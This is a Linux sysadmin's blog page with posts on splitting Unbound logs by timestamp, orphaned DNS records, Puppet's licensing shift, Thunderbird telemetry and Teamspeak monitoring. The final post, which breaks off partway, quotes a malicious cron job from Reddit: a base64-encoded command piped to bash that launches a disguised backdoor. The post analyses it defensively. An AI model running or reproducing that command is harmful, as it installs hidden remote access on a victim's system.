Feuerfest

Just the private blog of a Linux sysadmin

How to properly split logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS-based ad blocking in my home network. Additionally, I installed Unbound on it as a recursive DNS resolver. Meaning: I can use the Raspberry Pi in my home network as the DNS server for all my devices. This way I don't have to use my ISP's DNS servers, which grants me some additional privacy. It also lets me see which DNS queries each device sends. Leading to surprising revelations.

However, recently my internet connection was interrupted, and afterwards I noticed that I couldn't access any site or service I connect to via a domain or hostname. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabytes in size. Whoops. That's what happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen command, which is a good idea to trigger after each rotation. This way Unbound properly closes the old filehandle and writes to the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}

But wait, there is more

I still had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work with conveniently. 49,184,687 lines are just too much, especially on a Raspberry Pi with its comparatively limited CPU power. Now, I could have just split it after every n lines using split -l number-of-lines, but:

  • that would have been too easy, and
  • I had recently encountered the need for a script which splits logfile lines based on a range of timestamps more than once

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines have the Unix timestamp in brackets, followed by the process name, the log level the message belongs to and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However, some multi-line messages won't follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will, however, also show an awk command that filters based on the timestamps alone, which is useful for logfiles where every line is prefixed with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds, as date automatically assumes 00:00:00 for these values, giving us the first second of a day. And date also takes care of leap years and possibly a lot of other nuisances that come up in time and date calculations.

To get the last second of a month we simply take the first day of the month, add one month and subtract one second. It couldn't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599
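One caveat worth noting: %s converts via the local timezone, so the epoch values above reflect my CET/CEST setup. Pinning TZ makes the calculation reproducible on any machine. As a quick sketch (assuming GNU date, which the commands above already use), February 2024 also confirms the leap-year handling:

```shell
# Pin the timezone so the epoch value is reproducible on any machine.
# February 2024 is a leap month - date correctly lands on the 29th:
TZ=UTC date -d "2024/02/01 + 1 month - 1 second" "+%Y/%m/%d %X - %s"
```

With TZ=UTC the date part comes out as 2024/02/29 and the epoch as 1709251199.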

To verify the values we can use this for-loop. It gives us all the dates and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets, we need to tell awk to treat both [ and ] as field separators. Then we can use awk to check whether the second field lies in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to output only the Unix timestamp.

As the logfile starts in November 2023, I set the values accordingly. awk then conveniently writes all lines whose timestamp lies between these two values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine if every line started with a timestamp. As this is not the case, we need to add a bit more logic.
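The limitation is easy to demonstrate with a synthetic three-line logfile (paths and content made up for illustration):

```shell
# Build a tiny sample log: two bracketed lines, one continuation line.
cat > /tmp/sample.log <<'EOF'
[1700000000] unbound[1:0] info: first line
;; continuation line without a timestamp
[1700000001] unbound[1:0] info: second line
EOF

# The timestamp filter from above: the continuation line has no usable
# second field, fails the comparison and is silently dropped.
awk -F'[\\[\\]]' -v MIN=1700000000 -v MAX=1700000001 \
  '{if($2 >= MIN && $2 <= MAX) print}' /tmp/sample.log
```

Only the two bracketed lines survive; anything between them is lost, which is exactly what must not happen with Unbound's multi-line messages.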

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Split the logfile solely based on timestamps
      "$AWK" -F'[\\[\\]]' -v MIN="${FIRST_SECOND}" -v MAX="${LAST_SECOND}" '{if($2 >= MIN && $2 <= MAX) print}' "$LOGFILE" >> "/var/log/unbound/unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles would probably fill up our diskspace,
      #  therefore we gzip each one immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh... yeah, I had a fallacy here, as that still wouldn't have worked for multi-line log messages without a timestamp. Also, using grep like this is highly inefficient. While that would be fine for a one-time script, I still hit a road block.

I just wasn't able to get awk to do what I wanted, so I resorted to asking my question on StackOverflow. Better to get input from others than to waste a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to derive the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched the line numbers per month exactly. Even multi-line log messages and empty lines were included.

All I then did was add gzip to compress each file right before the next one is created, just to avoid filling up the disk completely. Additionally, I changed the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, that filename scheme won't work with logrotate, but I just need the files to dig through them properly, and the year-month naming is a great help here. Afterwards I don't need them anymore and will delete them, so this was of no concern to me.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And it is easily usable for other logfiles too: just adapt the leading regular expression to match the format the logfile uses, and adapt the strftime logic so the proper timestamp can be parsed. Note that strftime() is a GNU awk extension, so this one-liner needs gawk rather than mawk or BSD awk.
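As a hypothetical example of such an adaptation (filenames and log format invented for illustration): for a logfile whose lines start with an ISO date such as 2024-11-01 00:00:00, no strftime() is even needed, since year and month can be cut straight out of the first field:

```shell
# Sample logfile in a made-up ISO-date format:
cat > /tmp/iso.log <<'EOF'
2024-10-31 23:59:59 last line of October
2024-11-01 00:00:00 first line of November
continuation line without a timestamp
EOF

# Same splitting pattern as above, but the filename is derived with substr():
# "2024-11-01" -> "2024-11". Continuation lines go to the current file.
awk '$1 ~ /^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]$/ {
  f = "/tmp/app-" substr($1, 1, 7) ".log"
  if (f != prev) { if (prev) close(prev); prev = f }
}
{ print > f }' /tmp/iso.log
```

/tmp/app-2024-10.log ends up with one line and /tmp/app-2024-11.log with two, the continuation line included.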

Sometimes it's better to ask other people. 😄

Comments

"It's always DNS."

Photo by Visual Tag Mx: https://www.pexels.com/photo/white-and-black-scrabble-tiles-on-a-white-surface-5652026/

"It's always DNS."
   - Common saying among system administrators, developers and network admins alike.

Recently my blogpost about Puppet's move to go semi-open-source gained some attention, and I grew curious where it was mentioned and what people thought about it. Therefore I did a quick search for "puppet goes enshittyfication" and was presented with a few results. Mostly Mastodon posts, but also one website from Austria (the country without kangaroos 😁). Strangely it also copied my site title, not just the article title, as it showed up as "Feuerfest | Puppet goes enshittyfication".

Strange.

I clicked on it and received a certificate warning that the domain in the certificate doesn't match the domain I'm trying to visit.

I ignored the warning and was presented with a 1:1 copy of my blog. Just the images were missing. Huh? What? Is somebody copying my blog?

A short whois on the domain name revealed nothing shady. It belonged to an Austrian organization whose goal is to inform people about becoming a priest in the Catholic Church and to support seminarians. Ok, so definitely nothing shady.

I looked at the certificate and... what? It was issued for "admin.brennt.net" by Let's Encrypt. From all I know that shouldn't be possible, as that domain is validated against my Let's Encrypt account. I checked the certificate's fingerprints and... they were identical. Huh?

That would mean that either someone had managed to get the private key for my certificate (not good!) or had created a fake private key which a webserver somehow accepted. And wouldn't Firefox complain about that, or wouldn't the TLS handshake fail? (If somebody knows the answer to this, please comment. Thank you!)

I was confused.

Maybe the IP/hoster of the server will shed some light on this?

Aaaaand it was the current IP of this blog/host. Nothing shady. Nothing strange. Just orphaned DNS records from a long-gone web project.

As I know that Google - and probably any other search engine too - doesn't like duplicate content I helped myself with a RewriteRule inside this vHost.

# Rewrite for old, orphaned DNS records from other people..
RewriteEngine On
<If "%{HTTP_HOST} == 'berufungimzentrum.at'">
    RewriteRule "^(.*)$" "https://admin.brennt.net/please-delete.txt"
</If>

Now everyone visiting my site via "that other domain" will receive a nice txt-file asking to please remove/change the DNS entries.

It certainly IS always DNS.

EDIT: As I regularly read my webserver's logfiles I noticed that there are additional domains which point to this host. So I added additional If-statements to my vHost config and added those domains to the txt-file. 😇
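If several foreign hostnames point at the server, the If-statements can also be collapsed into a single block by matching the Host header against an alternation regex. A sketch with placeholder domain names (the actual orphaned domains differ):

```apache
RewriteEngine On
# Placeholder domains - replace with the actual orphaned hostnames
<If "%{HTTP_HOST} =~ /^(orphaned-one\.example|orphaned-two\.example)$/">
    RewriteRule "^(.*)$" "https://admin.brennt.net/please-delete.txt"
</If>
```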


Puppet goes enshittyfication (Updated)

Photo by Pixabay: https://www.pexels.com/photo/computer-screen-turned-on-159299/

This one came unexpectedly. Puppetlabs, the company behind the configuration management software Puppet, was purchased by Perforce Software in 2022 (and renamed "Puppet by Perforce") and now, in November 2024, we start to see the fallout of this.

As Puppetlabs announced in a blogpost on November 7th 2024, they are, to use a euphemism, "moving the Puppet source code in-house".

Or in their words (emphasis mine):

In early 2025, Puppet will begin to ship any new binaries and packages developed by our team to a private, hardened, and controlled location. Our intention with this change is not to limit community access to Puppet source code, but to address the growing risk of vulnerabilities across all software applications today while continuing to provide the security, support, and stability our customers deserve.

They then go on at length about why this doesn't affect customers or the community, and how the community can still get access to that private, hardened and controlled location via a separate "development license (EULA)". However, currently nothing is known about the nature of that EULA, and information will only be released in early 2025 - that is, after the split has been made.

To say it bluntly: I call bullshit. The whole talk about security and supply-chain risks is nonsense. If Puppet really wanted to enhance the technical security of their software product, they could have achieved that in a myriad of other ways:

  • Like integrating a code scanner into their build pipelines
  • Doing regular code audits (with/from external companies)
  • Introducing a four-eyes-principle before commits are merged into the main branch
  • Participating in bug-bounty programs
  • And so on...

There is simply no reason to limit access to the source code to achieve that goal. (And I am not even touching the topic of FUD, or how open source enables easier and faster spotting of software defects and vulnerabilities.) Therefore this can only be viewed as a straw-man argument to mask the real intention. I see it as what it truly is: an attempt to maximize revenue. After all, Perforce wants to see a return on their investment. And as fair as that is, the "how" leaves much to be desired...

We already have some sort of proof. Ben Ford, a former Puppet employee, wrote a blogpost, Everything is on fire..., in mid-October 2024, describing the negative experience he had in 2023 with Puppet's executives and vice-presidents when he tried to explain the whole community topic to them (emphasis mine):

"I know from personal experience with the company that they do not value the community for itself. In 2023, they flew me to Boston to explain the community to execs & VPs. Halfway through my presentation, they cut me off to demand to know how we monetize and then they pivoted into speculation on how we would monetize. There was zero interest in the idea that a healthy community supported a strong ecosystem from which the entire value of the company and product was derived. None. If the community didn’t literally hand them dollars, then they didn’t want to invest in supporting it."

I find that astonishing. Puppet is such a complex piece of configuration management software, with so many community-developed tools supporting it (think of g10k), that totally neglecting everything the community has achieved is mind-blowingly short-sighted. Puppet itself doesn't manage to keep up with all the tools they have released in the past. The fates of tools like Geppetto or the Puppet plugin for IntelliJ IDEA speak for themselves. Promising a fully-fledged Puppet IDE based on Eclipse and then letting it rot? No official support from "Puppet by Perforce" for one of the most used and commercially successful integrated development environments (IDEs)? Wow. This is work the community contributes. And as we now know, Puppet couldn't care less. Cool.

EDIT November 13th 2024: I forgot to add some important facts regarding Puppet's ecosystem and the community:

I consider at least the container images to be of utmost priority for many customers. And neglecting all the important tools around your core product isn't going to help either. These are exactly the kind of requirements customers have and the questions they ask:

  • How can we run it ourselves, without constantly buying expensive support?
  • How long will it take to build up sufficient experience?
  • What technology knowledge do our employees need in order to provide a flawless service?
  • How can we ease routine tasks? / What tools are there to help us during daily business?

Currently Puppet has a steep learning curve which is only made easier thanks to the community. And now we know Perforce doesn't see this as adding any kind of value to their company. Great.

EDIT END

The most shocking part for me was that the Apache 2.0 license doesn't require the source code itself to be available. Simply publishing a changelog should be enough to stay legally compliant (not talking about staying morally compliant here...). And as he pointed out in another blogpost from November 8th, 2024, there is a reason they cannot change the license (emphasis mine, matching the author's):

"But here’s the problem. It was inconsistently maintained over the history of the project. It didn’t even exist for the first years of Puppet and then later on it would regularly crash or corrupt itself and months would go by without CLA enforcement. If Perforce actually tried to change the license, it would require a long and costly audit and then months or years of tracking down long-gone contributors and somehow convincing them to agree to the license change.

I honestly think that’s the real reason they didn’t change the license. Apache 2 allows them to close the source away and only requires that they tell you what they changed. A changelog might be enough to stay technically compliant. This lets them pretend to be open source without actually participating."

I absolutely agree with him. They wanted to go closed source but simply couldn't, as they never intended to back then. Or as someone on the internet put it: "Luckily the CLA is ironclad." So instead they did what was possible, and that is moving the source code to an internal repository and using that as the source for all official Puppet packages. But will we as a community still have access to those packages?

For me, based on how the blogpost is written, I tend to say: no. Say goodbye to https://yum.puppetlabs.com/ and https://apt.puppetlabs.com/. Say goodbye to an easy way of getting your Puppet Server, Agent and Bolt packages for your Linux distribution of choice.

Update 15th November 2024: I asked Ben Ford in one of his LinkedIn posts whether there is a decision regarding the repositories, and he replied: "We will be meeting next week to discuss details. We'll all know a bit more then." As good as it is that this topic isn't off the table, it still adds to the current uncertainty. Personally I would have thought that those are the details you finalize before making such an announcement... but ah well, everyone is different. Update End

A myriad of new problems

This creates a myriad of new problems.

1. We will see a break between "Puppet by Perforce" packages and community packages, in technical compatibility and, most likely, in functionality too.

This mostly depends on how much Puppet contributes back to the open source repository and/or how well-written the changelog is - and regarding the latter, I invite you to check some of their release notes for new Puppet Server versions (Puppet Server 7 Release Notes / Puppet Server 8 Release Notes), although it got better with version 8... Granted, they already stated the following in their blogpost (emphasis mine):

We will release hardened Puppet releases to a new location and will slow down the frequency of commits of source code to public repositories.

This means customers using the open source variant of Puppet will be in somewhat dangerous waters regarding compatibility with the commercial variant, and vice versa. And I'm not speaking about the inter-compatibility of Puppet servers from different packages alone: think of things like "how the Puppet CA works" or "how catalogues are generated". Keep in mind: migrating from one product to the other can also get significantly harder.

This could even affect Puppet module development, in case the commercial Puppet server contains resource types the community-based one doesn't, or implements them slightly differently. This will affect customers on both sides badly and doesn't make Puppet look good. Is Perforce sure this move wasn't sponsored by RedHat/Ansible, their biggest competitor?

2. Documentation disaster

As bad as the state of the Puppet documentation is (I find it extremely lacking in every aspect), at least there is one, and it is the only one. Starting in 2025 we will have two sets of documentation. Have fun working out the kinks...

Additionally, the documentation won't get better. Apparently, according to this source, "Perforce actually axed our entire Docs team!" How good will a changelog or the documentation be when it is nobody's responsibility?

3. Community provided packages vs. vendor packages

Nearly all customers I have worked with have some kind of policy regarding what type of software is allowed on a system and how that is defined. Sometimes this goes as far as "no community-supported software, only software with official vendor support". Starting in 2025 this would mean these customers would need to move to Puppet Enterprise and ditch the community packages. The problem I foresee is this: many customers already use Ansible in parallel, and most operations teams are tired of having to use two configuration management solutions. This gives them a strong argument in favour of Ansible, especially in times of economic hardship and budget cuts.

But again: having packages from Puppet itself at least makes sure you have the same packages everywhere. In 2025, when the main, sole and primary source for those packages goes dark, numerous others are likely to appear. Remember Oracle's move to make the Oracle JVM a paid-only product for commercial use? And how that fostered the creation of dozens of different JVM builds? Yeah, that's a quite possible scenario for the Puppet Server and Agent too. Although I doubt we will ever see more than 3-4 viable parallel solutions at any time, given the amount of work involved and the fact that Puppet isn't as widely required as a JVM. Still, this poses a huge operational risk for every customer.

4. Was this all intentional?

I'm not really sure whether Perforce considered all this. However, they are not stupid. They surely must see the ramifications of their change. And this will lead to customers asking themselves ugly questions. Questions like: "Was this kind of uncertainty intentional?" This shatters trust on a basic level. Trust that might never be regained.

5. Community engagement & open source contributors

Another big question is community engagement. We now have a private equity company which thinks nothing of the community, and the community knows this. There has already been a drop in activity since the acquisition of Puppet by Perforce, and I think this trend will continue. After all, the current situation amounts to: "We take everything from the community we want, but decide very carefully what, and if, we give anything back in return." This doesn't work for many open source contributors. And it is the main reason why many will view Puppet as closed source from 2025 onward. Despite it technically still being open source - but again, the community values morals & ethics higher than legal correctness.

So, where are we heading?

Personally I wouldn't be too surprised if this is the moment we will look back to in the future and say: "This was the start of the downfall. This is when Puppet became more and more irrelevant, until its demise." My personal viewpoint is that Puppet has lacked vision and discipline for some years. Lots of stuff was created, promoted and abandoned. Lots of stuff was handed over to the community to maintain. But still the ecosystem wasn't made easier, wasn't streamlined. The documentation wasn't as detailed as it should be. Tools and command-line clients lacked certain features you had to work around yourself. And so on... I even ditched Puppet for my homelab recently in favour of Ansible. The overhead I had to carry just to keep Puppet running, the extra work generated by Puppet itself, simply doesn't exist with Ansible.

In my text Get the damn memo already: Java11 reached end-of-life years ago I wrote:

If you sell software, every process involved in creating that piece of software should be treated as part of your core business and main revenue stream. Giving it the attention it deserves. If you don't, I'm going to make a few assumptions about your business. And those assumptions won't be favourable.

And this includes the community around your product. Especially more so for open source software.

Second, I won't be surprised if many customers don't take the bait, don't switch to a commercial license, ride Puppet as long as it is feasible and then just switch to Ansible.

Maybe we will also see a fork, giving the community the possibility to break with Puppet functionality and to no longer maintain compatibility.

Time will tell.

New developments

This was added on November 15th: the first community-built packages are now available. So it looks like a fork is happening.

Read: https://overlookinfratech.com/2024/11/13/fork-announce/

EDIT: A newer post regarding the developments around the container topic and fork is here: Puppet is dead. Long live OpenVox!


First release of the Thunderbird for Android app and a little bit of drama

Photo by Pixabay: https://www.pexels.com/photo/red-pencil-on-top-of-white-window-envelope-236713/

I had already forgotten that Mozilla bought K9-Mail in June 2022 in order to transform K9-Mail into Thunderbird on Android. Now I was reminded again, as on October 30th 2024 the first Android version of Thunderbird was released.

However, the initial beta releases were accompanied by a little bit of drama regarding data privacy, as the first releases of the Thunderbird app contained telemetry trackers from Mozilla which were enabled by default (opt-out instead of the more privacy-friendly opt-in). Additionally, the user wasn't made aware of this during the install and configuration process.

Many users became aware of these facts through the following GitHub issue: Thunderbird Issue 8199: Expose the ability to manage Telemetry settings on first-time use, where the reporter simply stated, in a factual way, that he expected these settings to be off initially.

However, the first reply to that issue didn't make things better. A Senior Manager, Mobile Engineering at MZLA Technologies Corporation, the subsidiary of the Mozilla Corporation of which Thunderbird is now a part, wrote the following reply:

Unfortunately we cannot make this type of data collection opt-in because the limited data from voluntary reports wouldn’t provide enough insights to make informed product decisions. Opt-in data would come from a small, biased subset, leading to flawed conclusions.

Knowing the Android ecosystem covers a vast range of hardware and form factors, we need to have a mechanism to make better decisions on how features are being used, and have information in which environments user might be having trouble.

In line with Mozilla’s data practices, the default data collected contains no personal information. This helps us understand how features are used and where issues may occur, while minimizing data points and retaining only what's necessary. When we decide on new probes, we actively consider if we really need the information, and if there are ways we could reduce the needed retention time or scope.

While I can't offer an opt-in at this time, I understand your concerns and genuinely appreciate that you're thinking critically about privacy. You might also be interested in a recent talk about our need for privacy respecting telemetry. https://blog.thunderbird.net/2024/08/thunderbird-goes-to-guadec-2024/

This again sparked a lot of comments, which can be sorted into the following categories:

  1. Disappointment that an application developed by Mozilla uses such shady practises. Along with criticism that users are not informed about this and there are no information on what type of information is gathered and how it is used.
  2. Notices on the various laws forbidding such data collection (especially the GDPR from the EU).
  3. Sadness that, while K-9 Mail was tracker-free, Thunderbird obviously won't be. This disappoints many privacy-focused users.

Or as someone, sarcastically, pointed out on Mastodon (Source):

How could K-9 be developed and become the best email app for Android, and even make ‘informed product decisions’ without a tracker? Sarcasm over.

With the 8.0b2 release that feature was removed and will, hopefully, be reworked in a way that respects user consent.

Personally I am also very disappointed, and my trust has taken a huge blow. Mozilla once stood as a beacon of user-centred interests. And while I wholeheartedly agree that they should be able to gather usage metrics, I want this to happen in an open and consensual way: enabling users to actually make a choice and informing them about the nature of the data being transmitted.

Other resources

There is an FAQ what will happen to K9-Mail and Thunderbird in the future: https://blog.thunderbird.net/2022/06/faq-thunderbird-mobile-and-k-9-mail/

The roadmap can be found here: https://developer.thunderbird.net/planning/android-roadmap

Comments

Monitoring Teamspeak3 servers with check_teamspeak3 & Icinga2

Photo by cottonbro studio: https://www.pexels.com/photo/woman-sitting-on-the-floor-among-laptops-and-tangled-cables-and-wearing-goggles-8721343/

Just a short note, as no one seems to really mention this: if you want to monitor your Teamspeak 3 server with Icinga2 (or Nagios or any other compatible monitoring system), check_teamspeak3 from xicon.eu / xiconfjs still works flawlessly, despite the last commit being 3 years old.

A little bit of background, or: UDP monitoring is hard

Teamspeak 3 - being a voice chat - utilizes UDP for most of its services. Understandably so, as speed is key for enjoyable voice communication, which at the same time copes well with a few lost packets.

This, however, is the main problem in monitoring. With TCP you can open a simple TCP connection and, if the port is open, assume that your service is working. With UDP you can't, as UDP gives you no feedback on whether your packets were received: UDP entirely lacks the "Transmission Control" part of TCP in favour of faster packet sending and processing. Therefore you have to send a request that provokes a reply, and check that reply against your expected known-good response.

This means that you must delve into the depths of a protocol in order to know what your packets must contain. And this is the part where it often gets complicated, time-consuming and cumbersome. More often than not, people rather go with a "Let's just check if the process is running" or "If the application opens a TCP port too, let's just check that one" solution.

I, however, wanted a detailed check, and check_teamspeak3 does exactly this. It connects to the voice datagram port, sends appropriately encoded UDP packets and checks the reply. Et voilà: we have a monitoring check that really verifies the working condition.

Thanks xiconfjs!

Alternatives

For those who came here searching for other ways to monitor Teamspeak 3, you can of course do one of the following:

  • Check if the Teamspeak process is running
  • Examine the list of locally opened ports and check if the ports are in listening mode (lsof, netstat, etc.)
  • Expose the serverquery port and do your checks via commands (see: https://community.teamspeak.com/t/how-to-use-the-server-query/25386)
  • The FileTransfer part of Teamspeak uses a TCP port, you could verify that this port is open with a simple check_tcp servicecheck
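As a sketch of the last option: a minimal Icinga2 service definition using the tcp check command from the bundled Icinga Template Library could look like this. The host name is a placeholder, and 30033 is Teamspeak 3's default file-transfer port; adjust both to your setup.

```
object Service "ts3-filetransfer" {
  // "generic-service" is the template shipped with Icinga2's sample config
  import "generic-service"

  host_name     = "ts3-server"
  check_command = "tcp"
  vars.tcp_port = 30033
}
```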
Comments

Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone asked on Reddit what this CronJob does, as it looked strange.

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. A very common method to - sort of - hide malicious content
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge, as the |base64 -d|bash; part clearly shows that the base64 string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
